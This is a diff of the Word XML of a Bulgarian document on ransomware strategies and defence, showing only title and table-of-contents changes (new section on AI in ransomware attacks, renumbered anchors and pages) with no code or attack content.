+        <w:t xml:space="preserve">? Стратегии и защита от </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
@@ -339,12 +334,11 @@
           <w:kern w:val="0"/>
           <w:sz w:val="48"/>
           <w:szCs w:val="48"/>
-          <w:lang w:val="en-US"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve"> ransomware? </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>ransomware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
@@ -353,80 +347,9 @@
           <w:kern w:val="0"/>
           <w:sz w:val="48"/>
           <w:szCs w:val="48"/>
-          <w:lang w:val="en-US"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Стратегии</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> и </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>защита</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>от</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ransomware.</w:t>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -668,7 +591,7 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
           <w:r>
@@ -680,7 +603,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc223385505" w:history="1">
+          <w:hyperlink w:anchor="_Toc223468464" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -708,7 +631,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223385505 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223468464 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -748,10 +671,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223385506" w:history="1">
+          <w:hyperlink w:anchor="_Toc223468465" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -786,7 +709,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223385506 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223468465 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -826,10 +749,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223385507" w:history="1">
+          <w:hyperlink w:anchor="_Toc223468466" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -864,7 +787,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223385507 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223468466 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -905,10 +828,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223385508" w:history="1">
+          <w:hyperlink w:anchor="_Toc223468467" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -920,34 +843,34 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
+                <w:lang w:eastAsia="bg-BG"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve">Ранна фаза на </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t>Ransomware</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t xml:space="preserve">Ранна фаза на </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>Ransomware</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -958,7 +881,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223385508 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223468467 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -999,10 +922,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223385509" w:history="1">
+          <w:hyperlink w:anchor="_Toc223468468" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1014,49 +937,49 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
+                <w:lang w:eastAsia="bg-BG"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t>Ransomware</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve"> използващ </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>RSA</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve"> криптиране</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>Ransomware</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t xml:space="preserve"> използващ </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>RSA</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t xml:space="preserve"> криптиране</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1067,7 +990,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223385509 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223468468 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1108,10 +1031,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223385510" w:history="1">
+          <w:hyperlink w:anchor="_Toc223468469" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1124,27 +1047,27 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
+                <w:lang w:eastAsia="bg-BG"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t>Spear phishing Ransomware</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>Spear phishing Ransomware</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1155,7 +1078,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223385510 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223468469 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1196,10 +1119,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223385511" w:history="1">
+          <w:hyperlink w:anchor="_Toc223468470" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1212,49 +1135,49 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
+                <w:lang w:eastAsia="bg-BG"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t>Ransomware</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve"> в </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Android </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>базирани системи</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>Ransomware</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t xml:space="preserve"> в </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Android </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t>базирани системи</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1265,7 +1188,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223385511 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223468470 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1306,10 +1229,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223385512" w:history="1">
+          <w:hyperlink w:anchor="_Toc223468471" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1321,42 +1244,42 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
+                <w:lang w:eastAsia="bg-BG"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t xml:space="preserve">Big Game Hunting (BGH) </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve">и </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>Ransomware</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Big Game Hunting (BGH) </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t xml:space="preserve">и </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>Ransomware</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1367,7 +1290,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223385512 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223468471 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1407,16 +1330,16 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223385513" w:history="1">
+          <w:hyperlink w:anchor="_Toc223468472" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t xml:space="preserve">Имплементация на </w:t>
+              <w:t xml:space="preserve">Ролята на </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1424,10 +1347,32 @@
                 <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t xml:space="preserve">AI </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve">в </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
               <w:t>Ransomware</w:t>
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve"> атаките</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1445,7 +1390,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223385513 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223468472 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1485,15 +1430,93 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223385514" w:history="1">
+          <w:hyperlink w:anchor="_Toc223468473" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
+              <w:t xml:space="preserve">Имплементация на </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>Ransomware</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223468473 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>13</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="bg-BG"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc223468474" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
               <w:t xml:space="preserve">Демонстрация на </w:t>
             </w:r>
             <w:r>
@@ -1523,7 +1546,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223385514 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223468474 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1543,7 +1566,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>14</w:t>
+              <w:t>15</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1563,10 +1586,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223385515" w:history="1">
+          <w:hyperlink w:anchor="_Toc223468475" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1593,7 +1616,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223385515 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223468475 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1613,7 +1636,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>14</w:t>
+              <w:t>15</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1633,10 +1656,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223385516" w:history="1">
+          <w:hyperlink w:anchor="_Toc223468476" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1663,7 +1686,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223385516 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223468476 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1683,7 +1706,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>15</w:t>
+              <w:t>16</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1703,10 +1726,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223385517" w:history="1">
+          <w:hyperlink w:anchor="_Toc223468477" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1733,7 +1756,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223385517 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223468477 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1753,7 +1776,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>16</w:t>
+              <w:t>17</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1773,10 +1796,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223385518" w:history="1">
+          <w:hyperlink w:anchor="_Toc223468478" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1811,7 +1834,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223385518 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223468478 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1831,7 +1854,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>17</w:t>
+              <w:t>18</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1851,10 +1874,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223385519" w:history="1">
+          <w:hyperlink w:anchor="_Toc223468479" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1889,7 +1912,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223385519 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223468479 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1909,7 +1932,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>18</w:t>
+              <w:t>19</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1930,10 +1953,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
